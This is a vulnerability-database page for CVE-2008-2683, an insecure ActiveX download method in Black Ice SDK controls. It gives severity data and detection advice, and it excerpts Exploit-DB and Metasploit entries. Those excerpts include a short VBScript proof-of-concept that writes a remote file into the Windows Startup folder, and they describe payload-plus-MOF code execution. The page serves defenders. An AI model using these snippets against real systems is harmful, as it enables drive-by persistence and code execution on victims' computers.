CVE-2008-2683
published 2008-06-12CVE-2008-2683: The BIDIB.BIDIBCtrl.1 ActiveX control in BIDIB.ocx 10.9.3.0 in Black Ice Barcode SDK 5.01 allows remote attackers to force the download and storage of…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
34.76%
98.2th percentile
The BIDIB.BIDIBCtrl.1 ActiveX control in BIDIB.ocx 10.9.3.0 in Black Ice Barcode SDK 5.01 allows remote attackers to force the download and storage of arbitrary files by specifying the origin URL in the first argument to the DownloadImageFileURL method, and the local filename in the second argument. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| black_ice | barcode_sdk | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect ActiveX instantiation of BIDIB.BIDIBCtrl.1 (CLSID {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}) or BIImgFrm.ocx (CLSID {79956462-F148-497F-B247-DF35A095F80B}) in browser script, particularly calls to the DownloadImageFileURL method with two arguments (remote URL + local file path). ↗
- →Alert on files written to C:\WINDOWS\system32\wbem\mof\ by a browser process, as the Metasploit module drops a MOF file there to achieve code execution via WMI. ↗
- →Alert on executable files written to the Startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup\) by a browser or ActiveX process, a persistence technique used in the Cover Page SDK exploit variant. ↗
- →Monitor for the 'migrate -f' post-exploitation command triggered via InitialAutoRunScript in Metasploit sessions originating from browser exploitation of this ActiveX control. ↗
- →The BIDIB.ocx control is marked 'Safe for Script' and 'Safe for Init' in the registry, meaning it can be instantiated from any web page without a kill-bit prompt. Audit registry keys for these safe-for-scripting flags on the vulnerable CLSIDs. ↗
- ·The Metasploit Cover Page SDK module (exploit/windows/browser/blackice_downloadimagefileurl) targets BIImgFrm.ocx 12.0.0.0 (CLSID 79956462-F148-497F-B247-DF35A095F80B) as its primary target, while the original CVE references BIDIB.ocx 10.9.3.0 (CLSID D2797899-BE27-4CDB-892F-4FDC26EA9BA9); both share the same vulnerable method. ↗
- ·The WMI MOF-based code execution technique used by the Metasploit module only works on Windows versions before Vista. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Black Ice Cover Page - ActiveX Control Arbitrary File Download (Metasploit)
exploitdb·2011-06-21
CVE-2008-2683 Black Ice Cover Page - ActiveX Control Arbitrary File Download (Metasploit)
Black Ice Cover Page - ActiveX Control Arbitrary File Download (Metasploit)
---
##
# $Id: blackice_downloadimagefileurl.rb 12992 2011-06-21 02:51:39Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
:vuln_test => nil,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',
'Description' => %q{
This module allows remote attackers to place arbitrary files on a users file system
by abusing the "
Exploit-DB
Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
exploitdb·2011-06-20
CVE-2008-2683 Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
---
Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit
arg1="http://www.google.com/robots.txt"
arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt"
target.DownloadImageFileURL arg1 ,arg2
# MSF Module
##
# $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
:vuln_test => n
Exploit-DB
Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities
exploitdb·2008-06-05
CVE-2008-2684 Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities
Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities
---
Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
and Memory Corruption
url: http://www.blackice.com
File : BIDIB.ocx
Ver. : 10.9.3.0
CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}
Mark.: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Windows XP Professional SP3 fully patched, with Internet Explorer 7
Windows 2k Professional SP3 fully patched, with Internet Explorer 6
In memory of rgod
Sub tryMe
test.DownloadImageFileURL "http://somesite.com/seed
Metasploit
Black Ice Cover Page ActiveX Control Arbitrary File Download
metasploit
Black Ice Cover Page ActiveX Control Arbitrary File Download
Black Ice Cover Page ActiveX Control Arbitrary File Download
This module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.
No writeups or analysis indexed.
http://secunia.com/advisories/30548http://securityreason.com/securityalert/8276http://securityreason.com/securityalert/8277http://www.exploit-db.com/exploits/17415http://www.osvdb.org/46007http://www.vupen.com/english/advisories/2008/1768/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42891https://www.exploit-db.com/exploits/5750http://secunia.com/advisories/30548http://securityreason.com/securityalert/8276http://securityreason.com/securityalert/8277http://www.exploit-db.com/exploits/17415http://www.osvdb.org/46007http://www.vupen.com/english/advisories/2008/1768/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42891https://www.exploit-db.com/exploits/5750
2008-06-12
Published